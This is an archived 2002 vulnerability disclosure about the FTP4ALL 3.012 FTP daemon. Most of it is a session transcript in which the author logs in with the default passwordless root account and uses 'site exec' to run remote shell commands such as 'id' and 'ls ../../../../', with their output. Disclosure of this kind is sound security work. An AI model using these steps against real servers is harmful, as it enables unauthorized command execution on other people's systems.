Retarded *feature* in ftp4all

Type securityvulns
Reporter Securityvulns
Modified 2002-01-04T00:00:00


Heres the latest versvion of ftp4all that I can find... version 3.012 This program is OLD and looks unmaintained its also got overflows so I wouldnt use it. * VERSION HISTORY ===== Version 3.012 (04 ... Bugfix: Possible buffer overflow in user ... for that (printf formattable). | `= Version ... More Results From:

Q: What is FTP4ALL ? A: FTP4ALL is a ftp daemon for unix systems. It runs under any normal user account and doesn't require any special rights to start. It has its own permission and user handling, and is mainly independent from the operating system it runs under (although it inherits any limitations of the user account under whcih it is running).

Q: Why should I use FTP4ALL, if there is <any ftp daemon> ? A: First, every other ftp daemon I know needs special privileges to run it. Then, there are system-integrated daemons which are used to access your shell accounts with the FTP protocol. FTP4ALL is different: you can generally run FTP4ALL from any account, without root access, with no power hit as compared with other advanced ftpdaemons.

Heres is a nice feature I have found in ftp4all.

EXEC * Syntax : exec <command> [<arguments>] Example: exec ls -al This executes a command on the server. The result is sent back over the control connection, i.e. you get a sequence of 200- lines. When the command finishes, the exit code is displayed. You can not run interactive commands such as a shell.

example usage of feature sh-2.05$ id uid=99(nobody) gid=99(nobody) groups=99(nobody) sh-2.05$ /home/ftp/my_site/sbin/ftpd FTP4ALL 3.012, Copyright (C) 1996-2000 by Crescent ( This program is FREE SOFTWARE and distributed under GNU PUBLIC LICENSE Server on host is ready and listening on *:2000 Base directory : /home/ftp/my_site Readme file : (none) Permission file: .permissions Errlog file : log/ftpd.err Log file : log/ftpd.log Log program : (none) Server program : /home/ftp/my_site/sbin/ftps

Joe Schmoe uses my server and knows default user is root with no pass sh-2.05$ ftp kf.ftp4all.boxen 2000 Connected to kf.ftp4all.boxen 220 FTP4ALL Server 3.012 (05/Mar/2000) ready. Name (localhost:nobody): root 331 Password required for root. Password: <default no passwd> 230 User root logged in. Remote system type is UNIX. Using binary mode to transfer files.

Lets use the built in w command to see whos logged in to ftpd ftp> site w 211- NR HANDLE GROUP ON-TM AC-TM MUP/MDN ACTIVITY / (LAST ACTIVITY) 211- 01·root 0 00:01 00:00 0/ 0 (LOGIN) 211 FTP4ALL v3.012 HH:MM MM:SS ON-TM=ONLINE TIME / AC-TM=ACTIVITY TIME

Lets try it another way ... this looks like w output from a shell. ftp> site exec w 200- 6:16pm up 14:32, 2 users, load average: 0.00, 0.02, 0.04 200-USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 200-root tty1 - 3:47am 14:28m 3.22s 0.07s xinit /etc/X11/ 200-root pts/0 - 3:48am 14:28m 0.03s 0.03s /bin/cat 200 EXEC finished with exitcode 0.

Lets check to make sure. ftp> ls ../../../../ 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. 226 Directory listing completed. nothing here

yes this is definately output from a shell ftp> site exec ls ../../../../ 200-bin 200-boot 200-dev 200-etc 200-home 200-lib 200-lost+found 200-mnt 200-opt 200-proc 200-root 200-sbin 200-tmp 200-usr 200-var 200 EXEC finished with exitcode 0. ftp>

so obviously you run commands as whoever this program was run as. The company suggests a non priv user like nobody. But if you are dumb you may have ran this as root. Have fun. ftp> site exec id 200-uid=99(nobody) gid=99(nobody) groups=99(nobody) 200 EXEC finished with exitcode 0.